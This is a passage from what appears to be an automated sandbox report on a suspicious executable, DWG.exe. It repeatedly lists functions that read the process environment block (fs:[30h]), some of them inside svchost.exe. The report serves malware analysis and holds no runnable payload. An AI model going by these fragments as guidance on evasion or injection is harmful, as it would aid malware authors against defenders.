Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h] 5_2_00A79240
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h] 5_2_00A79240
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h] 5_2_00A79240
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h] 5_2_00A79240
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B04257 mov eax, dword ptr fs:[00000030h] 5_2_00B04257
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h] 5_2_00AA4BAD
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h] 5_2_00AA4BAD
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h] 5_2_00AA4BAD
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B45BA5 mov eax, dword ptr fs:[00000030h] 5_2_00B45BA5
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A81B8F mov eax, dword ptr fs:[00000030h] 5_2_00A81B8F
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A81B8F mov eax, dword ptr fs:[00000030h] 5_2_00A81B8F
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B2D380 mov ecx, dword ptr fs:[00000030h] 5_2_00B2D380
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B3138A mov eax, dword ptr fs:[00000030h] 5_2_00B3138A
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AAB390 mov eax, dword ptr fs:[00000030h] 5_2_00AAB390
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA2397 mov eax, dword ptr fs:[00000030h] 5_2_00AA2397
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9DBE9 mov eax, dword ptr fs:[00000030h] 5_2_00A9DBE9
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 5_2_00AA03E2
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 5_2_00AA03E2
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 5_2_00AA03E2
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 5_2_00AA03E2
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 5_2_00AA03E2
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 5_2_00AA03E2
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B223E3 mov ecx, dword ptr fs:[00000030h] 5_2_00B223E3
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B223E3 mov ecx, dword ptr fs:[00000030h] 5_2_00B223E3
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00B223E3 mov eax, dword ptr fs:[00000030h] 5_2_00B223E3
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF53CA mov eax, dword ptr fs:[00000030h] 5_2_00AF53CA
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00AF53CA mov eax, dword ptr fs:[00000030h] 5_2_00AF53CA
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
Source: C:\Users\user\Desktop\DWG.exe Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h] 5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3131B mov eax, dword ptr fs:[00000030h]5_2_00B3131B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]5_2_00A7DB60
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA3B7A mov eax, dword ptr fs:[00000030h]5_2_00AA3B7A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA3B7A mov eax, dword ptr fs:[00000030h]5_2_00AA3B7A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7DB40 mov eax, dword ptr fs:[00000030h]5_2_00A7DB40
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48B58 mov eax, dword ptr fs:[00000030h]5_2_00B48B58
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7F358 mov eax, dword ptr fs:[00000030h]5_2_00A7F358
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8849B mov eax, dword ptr fs:[00000030h]5_2_00A8849B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B314FB mov eax, dword ptr fs:[00000030h]5_2_00B314FB
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]5_2_00AF6CF0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]5_2_00AF6CF0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]5_2_00AF6CF0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48CD6 mov eax, dword ptr fs:[00000030h]5_2_00B48CD6
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AABC2C mov eax, dword ptr fs:[00000030h]5_2_00AABC2C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]5_2_00B4740D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]5_2_00B4740D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]5_2_00B4740D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9746D mov eax, dword ptr fs:[00000030h]5_2_00A9746D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0C450 mov eax, dword ptr fs:[00000030h]5_2_00B0C450
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0C450 mov eax, dword ptr fs:[00000030h]5_2_00B0C450
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA44B mov eax, dword ptr fs:[00000030h]5_2_00AAA44B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA35A1 mov eax, dword ptr fs:[00000030h]5_2_00AA35A1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B405AC mov eax, dword ptr fs:[00000030h]5_2_00B405AC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B405AC mov eax, dword ptr fs:[00000030h]5_2_00B405AC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]5_2_00AA1DB5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]5_2_00AA1DB5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]5_2_00AA1DB5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAFD9B mov eax, dword ptr fs:[00000030h]5_2_00AAFD9B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAFD9B mov eax, dword ptr fs:[00000030h]5_2_00AAFD9B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B28DF1 mov eax, dword ptr fs:[00000030h]5_2_00B28DF1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]5_2_00A8D5E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]5_2_00A8D5E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48D34 mov eax, dword ptr fs:[00000030h]5_2_00B48D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3E539 mov eax, dword ptr fs:[00000030h]5_2_00B3E539
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]5_2_00AA4D3B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]5_2_00AA4D3B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]5_2_00AA4D3B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7AD30 mov eax, dword ptr fs:[00000030h]5_2_00A7AD30
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AFA537 mov eax, dword ptr fs:[00000030h]5_2_00AFA537
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9C577 mov eax, dword ptr fs:[00000030h]5_2_00A9C577
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9C577 mov eax, dword ptr fs:[00000030h]5_2_00A9C577
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB3D43 mov eax, dword ptr fs:[00000030h]5_2_00AB3D43
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF3540 mov eax, dword ptr fs:[00000030h]5_2_00AF3540
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B23D40 mov eax, dword ptr fs:[00000030h]5_2_00B23D40
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A97D50 mov eax, dword ptr fs:[00000030h]5_2_00A97D50
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF46A7 mov eax, dword ptr fs:[00000030h]5_2_00AF46A7
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]5_2_00B40EA5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]5_2_00B40EA5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]5_2_00B40EA5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0FE87 mov eax, dword ptr fs:[00000030h]5_2_00B0FE87
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]5_2_00AA16E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A876E2 mov eax, dword ptr fs:[00000030h]5_2_00A876E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48ED6 mov eax, dword ptr fs:[00000030h]5_2_00B48ED6
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA36CC mov eax, dword ptr fs:[00000030h]5_2_00AA36CC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]5_2_00AB8EC7
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]5_2_00B2FEC0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7E620 mov eax, dword ptr fs:[00000030h]5_2_00A7E620
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2FE3F mov eax, dword ptr fs:[00000030h]5_2_00B2FE3F
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]5_2_00A7C600
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]5_2_00A7C600
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]5_2_00A7C600
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA8E00 mov eax, dword ptr fs:[00000030h]5_2_00AA8E00
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA61C mov eax, dword ptr fs:[00000030h]5_2_00AAA61C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA61C mov eax, dword ptr fs:[00000030h]5_2_00AAA61C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31608 mov eax, dword ptr fs:[00000030h]5_2_00B31608
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8766D mov eax, dword ptr fs:[00000030h]5_2_00A8766D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]5_2_00A9AE73
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]5_2_00A87E41
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3AE44 mov eax, dword ptr fs:[00000030h]5_2_00B3AE44
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3AE44 mov eax, dword ptr fs:[00000030h]5_2_00B3AE44
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]5_2_00AF7794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]5_2_00AF7794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]5_2_00AF7794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A88794 mov eax, dword ptr fs:[00000030h]5_2_00A88794
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB37F5 mov eax, dword ptr fs:[00000030h]5_2_00AB37F5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A74F2E mov eax, dword ptr fs:[00000030h]5_2_00A74F2E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A74F2E mov eax, dword ptr fs:[00000030h]5_2_00A74F2E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B73D mov eax, dword ptr fs:[00000030h]5_2_00A9B73D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9B73D mov eax, dword ptr fs:[00000030h]5_2_00A9B73D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAE730 mov eax, dword ptr fs:[00000030h]5_2_00AAE730
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0FF10 mov eax, dword ptr fs:[00000030h]5_2_00B0FF10
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0FF10 mov eax, dword ptr fs:[00000030h]5_2_00B0FF10
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA70E mov eax, dword ptr fs:[00000030h]5_2_00AAA70E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA70E mov eax, dword ptr fs:[00000030h]5_2_00AAA70E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4070D mov eax, dword ptr fs:[00000030h]5_2_00B4070D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4070D mov eax, dword ptr fs:[00000030h]5_2_00B4070D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9F716 mov eax, dword ptr fs:[00000030h]5_2_00A9F716
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8FF60 mov eax, dword ptr fs:[00000030h]5_2_00A8FF60
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48F6A mov eax, dword ptr fs:[00000030h]5_2_00B48F6A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8EF40 mov eax, dword ptr fs:[00000030h]5_2_00A8EF40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03753B7A mov eax, dword ptr fs:[00000030h]10_2_03753B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03753B7A mov eax, dword ptr fs:[00000030h]10_2_03753B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372DB60 mov ecx, dword ptr fs:[00000030h]10_2_0372DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F8B58 mov eax, dword ptr fs:[00000030h]10_2_037F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372F358 mov eax, dword ptr fs:[00000030h]10_2_0372F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372DB40 mov eax, dword ptr fs:[00000030h]10_2_0372DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E131B mov eax, dword ptr fs:[00000030h]10_2_037E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
